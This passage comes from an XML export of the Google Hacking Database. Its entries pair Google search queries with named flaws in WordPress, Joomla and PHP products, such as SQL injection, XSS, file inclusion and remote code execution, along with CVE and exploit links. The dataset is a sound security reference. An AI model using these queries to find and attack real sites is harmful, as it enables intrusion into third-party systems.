</entry>
<entry>
<id>6092</id>
<link>https://www.exploit-db.com/ghdb/6092</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wp-product-review</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/wp-product-review
Description: This google dork lists out Advisories and Vulnerabilities
regarding the wp product review wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10226
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/wp-product-review</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wp-product-review</querystring>
<edb></edb>
<date>2020-05-18</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6328</id>
<link>https://www.exploit-db.com/ghdb/6328</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wpDiscuz</shortDescription>
<textualDescription># Google Dork: inurl:wp-content/plugins/wpDiscuz
# This google dork lists out Advisories and Vulnerabilities regarding
# the wpDiscuz plugin. Ref: https://wpvulndb.com/vulnerabilities/10273
[*] wpDiscuz &lt; 5.3.6 - Unauthenticated SQL Injection
[*] Author: Pankaj Verma (_p4nk4j)
[*] LinkedIn: https://www.linkedin.com/in/p4nk4jv/
</textualDescription>
<query>inurl:wp-content/plugins/wpDiscuz</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wpDiscuz</querystring>
<edb></edb>
<date>2020-06-24</date>
<author>Pankaj Verma</author>
</entry>
<entry>
<id>6460</id>
<link>https://www.exploit-db.com/ghdb/6460</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wpdiscuz</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/wpdiscuz
Description: This google dork lists out Advisories and Vulnerabilities regarding the wpdiscuz wordpress plugin.
Ref: https://wpvulndb.com/vulnerabilities/10333
Author: Gal Nagli
</textualDescription>
<query>inurl:wp-content/plugins/wpdiscuz</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wpdiscuz</querystring>
<edb></edb>
<date>2020-08-04</date>
<author>Gal Nagli</author>
</entry>
<entry>
<id>6376</id>
<link>https://www.exploit-db.com/ghdb/6376</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wpforms-lite</shortDescription>
<textualDescription>Description: inurl:wp-content/plugins/wpforms-lite
This google dorks give us the advisories and vulnerabilities on wordpress
plugins.
Ref: https://wpvulndb.com/vulnerabilities/10286
</textualDescription>
<query>inurl:wp-content/plugins/wpforms-lite</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wpforms-lite</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>6415</id>
<link>https://www.exploit-db.com/ghdb/6415</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wpjobboard</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/wpjobboard
https://wpvulndb.com/vulnerabilities/10113
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/wpjobboard</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wpjobboard</querystring>
<edb></edb>
<date>2020-07-17</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6325</id>
<link>https://www.exploit-db.com/ghdb/6325</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/YITH-WooCommerce-Ajax-Product-Filter</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/YITH-WooCommerce-Ajax-Product-Filter
Description: This google dork lists out Advisories and Vulnerabilities
regarding the YITH-WooCommerce-Ajax-Product-Filter wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10281
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/YITH-WooCommerce-Ajax-Product-Filter</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/YITH-WooCommerce-Ajax-Product-Filter</querystring>
<edb></edb>
<date>2020-06-23</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6180</id>
<link>https://www.exploit-db.com/ghdb/6180</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/yop-poll</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/yop-poll
Description: This google dork lists out Advisories and Vulnerabilities
regarding the Yop Poll wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10189
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/yop-poll</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/yop-poll</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6369</id>
<link>https://www.exploit-db.com/ghdb/6369</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/themes/careerfy</shortDescription>
<textualDescription>Dork: inurl:wp-content/themes/careerfy
Description: This google dork lists out Advisories and Vulnerabilities
regarding the careerfy wordpress theme. Ref:
https://wpvulndb.com/vulnerabilities/10291
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/themes/careerfy</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/themes/careerfy</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6371</id>
<link>https://www.exploit-db.com/ghdb/6371</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/themes/careerup</shortDescription>
<textualDescription>Dork: inurl:wp-content/themes/careerup
Description: This google dork lists out Advisories and Vulnerabilities
regarding the careerup wordpress theme. Ref:
https://wpvulndb.com/vulnerabilities/10289
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/themes/careerup</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/themes/careerup</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6330</id>
<link>https://www.exploit-db.com/ghdb/6330</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/themes/citybook</shortDescription>
<textualDescription>Dork: inurl:wp-content/themes/citybook
Description: This google dork lists out Advisories and Vulnerabilities
regarding the citybook wordpress theme. Ref:
https://wpvulndb.com/vulnerabilities/10275
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/themes/citybook</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/themes/citybook</querystring>
<edb></edb>
<date>2020-06-25</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6407</id>
<link>https://www.exploit-db.com/ghdb/6407</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/themes/corona</shortDescription>
<textualDescription>Dork: inurl:wp-content/themes/corona
Description: This google dorks give us the advisories and vulnerabilities
on WordPress Themes.
Ref.: https://wpvulndb.com/vulnerabilities/7345
Author: Abhinav Porwal
</textualDescription>
<query>inurl:wp-content/themes/corona</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/themes/corona</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6295</id>
<link>https://www.exploit-db.com/ghdb/6295</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/themes/newspaper</shortDescription>
<textualDescription>Dork: inurl:wp-content/themes/newspaper
Description: This google dork lists out Advisories and Vulnerabilities
regarding the newspaper wordpress theme. Ref:
https://wpvulndb.com/vulnerabilities/10253
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/themes/newspaper</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/themes/newspaper</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6368</id>
<link>https://www.exploit-db.com/ghdb/6368</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/themes/nexos</shortDescription>
<textualDescription>Dork: inurl:wp-content/themes/nexos
Description: This google dork lists out Advisories and Vulnerabilities
regarding the nexos wordpress theme. Ref:
https://wpvulndb.com/vulnerabilities/10285
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/themes/nexos</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/themes/nexos</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6381</id>
<link>https://www.exploit-db.com/ghdb/6381</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/themes/sparky</shortDescription>
<textualDescription>Dork: inurl:wp-content/themes/sparky
Description: This google dorks give us the advisories and vulnerabilities
on WordPress Themes.
Ref.: https://wpvulndb.com/vulnerabilities/7338
Author: Abhinav Porwal
</textualDescription>
<query>inurl:wp-content/themes/sparky</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/themes/sparky</querystring>
<edb></edb>
<date>2020-07-07</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6331</id>
<link>https://www.exploit-db.com/ghdb/6331</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/themes/traveler</shortDescription>
<textualDescription>Dork: inurl:wp-content/themes/traveler
Description: This google dork lists out Advisories and Vulnerabilities
regarding the traveler wordpress theme. Ref:
https://wpvulndb.com/vulnerabilities/10276
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/themes/traveler</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/themes/traveler</querystring>
<edb></edb>
<date>2020-06-25</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6353</id>
<link>https://www.exploit-db.com/ghdb/6353</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/themes/traveler</shortDescription>
<textualDescription>Google Dork: inurl:wp-content/themes/traveler
This google dork lists out Advisories and Vulnerabilities regarding the
Travel Booking themes.
Ref:https://wpvulndb.com/vulnerabilities/10276
*Travel Booking &lt; 2.8.2 - Unauthenticated Reflected XSS*
Author: Ritik Kumar Jain (Dasagreeva)
LinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/
</textualDescription>
<query>inurl:wp-content/themes/traveler</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/themes/traveler</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Ritik Kumar Jain</author>
</entry>
<entry>
<id>1383</id>
<link>https://www.exploit-db.com/ghdb/1383</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-login.php +Register Username Password &quot;remember me&quot; -echo -trac -footwear</shortDescription>
<textualDescription>this is a bit different from the previous one in GHDB, it searches for Wordpress 2.x sites where user registration is enabled, a user can inject a carriage return and php code inside cache files to have a shell on target systemadvisory &amp; poc exploit here: http://retrogod.altervista.org/wordpress_202_xpl.html</textualDescription>
<query>inurl:wp-login.php +Register Username Password &quot;remember me&quot; -echo -trac -footwear</query>
<querystring>https://www.google.com/search?q=inurl%3Awp-login.php+%2BRegister+Username+Password+%22remember+me%22+-echo+-trac+-footwear&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>3593</id>
<link>https://www.exploit-db.com/ghdb/3593</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-login.php Register Username Password -echo</shortDescription>
<textualDescription>CVE: 2006-2667
EDB-ID: 6
This search can potentially identify vulnerable installations of WordPress.</textualDescription>
<query>inurl:wp-login.php Register Username Password -echo</query>
<querystring>https://www.google.com/search?q=inurl:wp-login.php Register Username Password -echo</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5993</id>
<link>https://www.exploit-db.com/ghdb/5993</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:www/delivery filetype:php</shortDescription>
<textualDescription># Google Dork: inurl:www/delivery filetype:php
# Sites vulnerable to Revive Adserver 4.2 - Remote Code Execution. This
dork is linked to the following existing exploit:
https://www.exploit-db.com/exploits/47739
# Date: 2/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:www/delivery filetype:php</query>
<querystring>https://www.google.com/search?q=inurl:www/delivery filetype:php</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3052</id>
<link>https://www.exploit-db.com/ghdb/3052</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:yvcomment</shortDescription>
<textualDescription>Joomla Component yvcomment 1.16 Blind SQL Injection - CVE: 2008-2692: https://www.exploit-db.com/exploits/5755</textualDescription>
<query>inurl:yvcomment</query>
<querystring>https://www.google.com/search?q=inurl:yvcomment</querystring>
<edb>https://www.exploit-db.com/exploits/5755</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5992</id>
<link>https://www.exploit-db.com/ghdb/5992</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:zdm logon</shortDescription>
<textualDescription># Google Dork: inurl:zdm logon
# Sites vulnerable to Citrix XenMobile Server 10.8 - XML External Entity
Injection. This dork is linked to the following existing exploit:
https://www.exploit-db.com/exploits/47951
# Date: 2/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:zdm logon</query>
<querystring>https://www.google.com/search?q=inurl:zdm logon</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5316</id>
<link>https://www.exploit-db.com/ghdb/5316</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:zoom.us/j and intext:scheduled for</shortDescription>
<textualDescription>Dorks:
inurl:zoom.us/s
inurl:zoom.us/j
inurl:zoom.us/j and intext:scheduled for
Category : Sensitive Information
Summary:
A Google dork that gives the information about Zoom Meetings. *Dork
discovered by:* *Sachin Wagh (@tiger_tigerboy)*</textualDescription>
<query>inurl:zoom.us/j and intext:scheduled for</query>
<querystring>https://www.google.com/search?q=inurl:zoom.us/j and intext:scheduled for</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>Sachin Wagh</author>
</entry>
<entry>
<id>4992</id>
<link>https://www.exploit-db.com/ghdb/4992</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl=&quot;/uddiexplorer/SetupUDDIExplorer.jsp&quot;</shortDescription>
<textualDescription>Category: Page containing log in portal &amp; Web Server Detection
Description: This dork allows user to access default page of Oracle Weblogic Server - UDDI Explorer. Some of scanner tools would detect SSRF vulnerability for weblogic uddi explorer. Moreover, there is a flaw regarding the weblogic server version which vulnerables to XSS.
Reference: https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
Author: Zulfikar Azhari
</textualDescription>
<query>inurl=&quot;/uddiexplorer/SetupUDDIExplorer.jsp&quot;</query>
<querystring>https://www.google.com/search?q=inurl=&quot;/uddiexplorer/SetupUDDIExplorer.jsp&quot;</querystring>
<edb></edb>
<date>2018-10-17</date>
<author>Zulfikar Azhari</author>
</entry>
<entry>
<id>319</id>
<link>https://www.exploit-db.com/ghdb/319</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Invision Power Board SSI.PHP SQL Injection</shortDescription>
<textualDescription>Invision Power Board is reported prone to an SQL injection vulnerability in its ssi.php script. Due to improper filtering of user supplied data, ssi.php is exploitable by attackers to pass SQL statements to the underlying database. The impact of this vulnerability depends on the underlying database. It may be possible to corrupt/read sensitive data, execute commands/procedures on the database server or possibly exploit vulnerabilities in the database itself through this condition. Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versions may also be affected as well.More info: http://www.securityfocus.com/bid/10511/info/</textualDescription>
<query>&quot;Powered by Invision Power Board(U) v1.3 Final&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Powered+by+Invision+Power+Board%28U%29+v1.3+Final%22</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>2366</id>
<link>https://www.exploit-db.com/ghdb/2366</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>JBC explorer [ by Psykokwak &amp; XaV ]</shortDescription>
<textualDescription>Explorer V7.20 Cross Site Scripting Vulnerability: https://www.exploit-db.com/exploits/10566</textualDescription>
<query>JBC explorer [ by Psykokwak &amp; XaV ]</query>
<querystring>https://www.google.com/search?q=JBC+explorer+[+by+Psykokwak+%26+XaV+]</querystring>
<edb>https://www.exploit-db.com/exploits/10566</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3219</id>
<link>https://www.exploit-db.com/ghdb/3219</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Lebi soft Ziyaretci Defteri_v7.5</shortDescription>
<textualDescription>Lebi soft Ziyaretci Defteri_v7.5 DB Download Vulnerabilit - CVE: 2010-1065: https://www.exploit-db.com/exploits/11015</textualDescription>
<query>Lebi soft Ziyaretci Defteri_v7.5</query>
<querystring>https://www.google.com/search?q=Lebi+soft+Ziyaretci+Defteri_v7.5</querystring>
<edb>https://www.exploit-db.com/exploits/11015</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2032</id>
<link>https://www.exploit-db.com/ghdb/2032</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved</shortDescription>
<textualDescription>Maian Events 2.0 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6048</textualDescription>
<query>Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved</query>
<querystring>https://www.google.com/search?q=Maian+Events+v2.0+Copyright+%C3%82%C2%A9+2005-2008+Maian+Script+World.+All+Rights+Reserved</querystring>
<edb>https://www.exploit-db.com/exploits/6048</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2112</id>
<link>https://www.exploit-db.com/ghdb/2112</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Maian Gallery v2.0 Copyright © 2006-2008 Maian Script World. All Rights Reserved.</shortDescription>
<textualDescription>Maian Gallery 2.0 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6049</textualDescription>
<query>Maian Gallery v2.0 Copyright © 2006-2008 Maian Script World. All Rights Reserved.</query>
<querystring>https://www.google.com/search?q=Maian+Gallery+v2.0+Copyright+%C3%82%C2%A9+2006-2008+Maian+Script+World.+All+Rights+Reserved.</querystring>
<edb>https://www.exploit-db.com/exploits/6049</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2121</id>
<link>https://www.exploit-db.com/ghdb/2121</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved.</shortDescription>
<textualDescription>Maian Music 1.0 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6051</textualDescription>
<query>Maian Music v1.0. Copyright © 2007-2008 Maian Script World. All Rights Reserved.</query>
<querystring>https://www.google.com/search?q=Maian+Music+v1.0.+Copyright+%C3%82%C2%A9+2007-2008+Maian+Script+World.+All+Rights+Reserved.</querystring>
<edb>https://www.exploit-db.com/exploits/6051</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1686</id>
<link>https://www.exploit-db.com/ghdb/1686</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Maintained with the Ocean12 Calendar Manager Gold v2.04</shortDescription>
<textualDescription>Ocean12 Calendar Manager Gold Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7247</textualDescription>
<query>Maintained with the Ocean12 Calendar Manager Gold v2.04</query>
<querystring>https://www.google.com/search?q=Maintained+with+the+Ocean12+Calendar+Manager+Gold+v2.04</querystring>
<edb>https://www.exploit-db.com/exploits/7247</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2176</id>
<link>https://www.exploit-db.com/ghdb/2176</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Maintained with the Ocean12 Contact Manager Pro v1.02</shortDescription>
<textualDescription>Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities - CVE: 2008-6369: https://www.exploit-db.com/exploits/7244</textualDescription>
<query>Maintained with the Ocean12 Contact Manager Pro v1.02</query>
<querystring>https://www.google.com/search?q=Maintained+with+the+Ocean12+Contact+Manager+Pro+v1.02</querystring>
<edb>https://www.exploit-db.com/exploits/7244</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1682</id>
<link>https://www.exploit-db.com/ghdb/1682</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Maintained with the Ocean12 Poll Manager Pro v1.00</shortDescription>
<textualDescription>Ocean12 Poll Manager Pro Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7246</textualDescription>
<query>Maintained with the Ocean12 Poll Manager Pro v1.00</query>
<querystring>https://www.google.com/search?q=Maintained+with+the+Ocean12+Poll+Manager+Pro+v1.00</querystring>
<edb>https://www.exploit-db.com/exploits/7246</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2070</id>
<link>https://www.exploit-db.com/ghdb/2070</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>mediaHolder.php?id</shortDescription>
<textualDescription>WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln: https://www.exploit-db.com/exploits/6842</textualDescription>
<query>mediaHolder.php?id</query>
<querystring>https://www.google.com/search?q=mediaHolder.php%3Fid</querystring>
<edb>https://www.exploit-db.com/exploits/6842</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>65</id>
<link>https://www.exploit-db.com/ghdb/65</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>mnGoSearch vulnerability</shortDescription>
<textualDescription>According to http://www.securityfocus.com/bid/9667, certain versions of mnGoSearch contain a buffer overflow vulnerability which allow an attacker to execute commands on the server.</textualDescription>
<query>&quot;Powered by mnoGoSearch - free web search engine software&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+mnoGoSearch+-+free+web+search+engine+software%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>2601</id>
<link>https://www.exploit-db.com/ghdb/2601</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>mod.php?mod=publisher&amp;op=printarticle&amp;artid=</shortDescription>
<textualDescription>eNdonesia 8.4 SQL Injection Vulnerability - CVE: 2010-3461: https://www.exploit-db.com/exploits/15006</textualDescription>
<query>mod.php?mod=publisher&amp;op=printarticle&amp;artid=</query>
<querystring>https://www.google.com/search?q=mod.php%3Fmod%3Dpublisher%26op%3Dprintarticle%26artid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/15006</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3270</id>
<link>https://www.exploit-db.com/ghdb/3270</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>myAlbum-P 2.0</shortDescription>
<textualDescription>XOOPS Module myAlbum-P</textualDescription>
<query>myAlbum-P 2.0</query>
<querystring>https://www.google.com/search?q=myAlbum-P+2.0</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3191</id>
<link>https://www.exploit-db.com/ghdb/3191</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>netGitar.com - Shop v1.0</shortDescription>
<textualDescription>Net Gitar Shopv1.0 DB Download Vulnerability: https://www.exploit-db.com/exploits/11016</textualDescription>
<query>netGitar.com - Shop v1.0</query>
<querystring>https://www.google.com/search?q=netGitar.com+-+Shop+v1.0</querystring>
<edb>https://www.exploit-db.com/exploits/11016</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1984</id>
<link>https://www.exploit-db.com/ghdb/1984</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>News powered by ashnews</shortDescription>
<textualDescription>ashNews 0.83 (pathtoashnews) Remote File Include Vulnerabilities - CVE: 2003-1292: https://www.exploit-db.com/exploits/1864</textualDescription>
<query>News powered by ashnews</query>
<querystring>https://www.google.com/search?q=News+powered+by+ashnews</querystring>
<edb>https://www.exploit-db.com/exploits/1864</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3363</id>
<link>https://www.exploit-db.com/ghdb/3363</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Nwahy.com 2.1 , inurl:'add-site.html'</shortDescription>
<textualDescription>Nwahy Dir 2.1 Arbitrary Change Admin Password: https://www.exploit-db.com/exploits/9087</textualDescription>
<query>Nwahy.com 2.1 , inurl:'add-site.html'</query>
<querystring>https://www.google.com/search?q=Nwahy.com+2.1+,+inurl:'add-site.html'</querystring>
<edb>https://www.exploit-db.com/exploits/9087</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1769</id>
<link>https://www.exploit-db.com/ghdb/1769</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>ogrencimezunlar.php</shortDescription>
<textualDescription>Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/3012</textualDescription>
<query>ogrencimezunlar.php</query>
<querystring>https://www.google.com/search?q=ogrencimezunlar.php</querystring>
<edb>https://www.exploit-db.com/exploits/3012</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2552</id>
<link>https://www.exploit-db.com/ghdb/2552</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Online Booking Manager2.2</shortDescription>
<textualDescription>Online Booking Manager 2.2 (id) SQL Injection Vulnerability - CVE: 2008-5194: https://www.exploit-db.com/exploits/5964</textualDescription>
<query>Online Booking Manager2.2</query>
<querystring>https://www.google.com/search?q=Online+Booking+Manager2.2</querystring>
<edb>https://www.exploit-db.com/exploits/5964</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2554</id>
<link>https://www.exploit-db.com/ghdb/2554</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>option=com_paxxgallery</shortDescription>
<textualDescription>Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection: https://www.exploit-db.com/exploits/5514</textualDescription>
<query>option=com_paxxgallery</query>
<querystring>https://www.google.com/search?q=option%3Dcom_paxxgallery</querystring>
<edb>https://www.exploit-db.com/exploits/5514</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1497</id>
<link>https://www.exploit-db.com/ghdb/1497</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>out.php?linkid=1</shortDescription>
<textualDescription>Link ADS 1 (out.php linkid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5930</textualDescription>
<query>out.php?linkid=1</query>
<querystring>https://www.google.com/search?q=out.php%3Flinkid%3D1</querystring>
<edb>https://www.exploit-db.com/exploits/5930</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1687</id>
<link>https://www.exploit-db.com/ghdb/1687</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>pagerank-0-topliste.html OR pagerank-0-tipp.html</shortDescription>
<textualDescription>phpscripts Ranking Script Insecure Cookie Handling Vulnerability - CVE: 2008-6092: https://www.exploit-db.com/exploits/6649</textualDescription>
<query>pagerank-0-topliste.html OR pagerank-0-tipp.html</query>
<querystring>https://www.google.com/search?q=pagerank-0-topliste.html++OR+pagerank-0-tipp.html</querystring>
<edb>https://www.exploit-db.com/exploits/6649</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2017</id>
<link>https://www.exploit-db.com/ghdb/2017</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>pages.php?id= &quot;Multi Vendor Mall&quot;</shortDescription>
<textualDescription>Multi Vendor Mall (itemdetail.php &amp; shop.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12755</textualDescription>
<query>pages.php?id= &quot;Multi Vendor Mall&quot;</query>
<querystring>https://www.google.com/search?q=pages.php%3Fid%3D+%22Multi+Vendor+Mall%22</querystring>
<edb>https://www.exploit-db.com/exploits/12755</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2964</id>
<link>https://www.exploit-db.com/ghdb/2964</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>pages.php?id= &quot;Multi Vendor Mall&quot;</shortDescription>
<textualDescription>Multi Vendor Mall (pages.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12748</textualDescription>
<query>pages.php?id= &quot;Multi Vendor Mall&quot;</query>
<querystring>https://www.google.com/search?q=pages.php%3Fid%3D+%22Multi+Vendor+Mall%22</querystring>
<edb>https://www.exploit-db.com/exploits/12748</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3681</id>
<link>https://www.exploit-db.com/ghdb/3681</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Photo Gallery powered by TinyWebGallery 1.8.3</shortDescription>
<textualDescription>Multiple Vulnerabilities: Non-persistent XSS + Directory Traversal: https://www.exploit-db.com/exploits/16090</textualDescription>
<query>Photo Gallery powered by TinyWebGallery 1.8.3</query>
<querystring>https://www.google.com/search?q=Photo+Gallery+powered+by+TinyWebGallery+1.8.3</querystring>
<edb>https://www.exploit-db.com/exploits/16090</edb>
<date>2011-02-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>2513</id>
<link>https://www.exploit-db.com/ghdb/2513</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>photokorn 1.52</shortDescription>
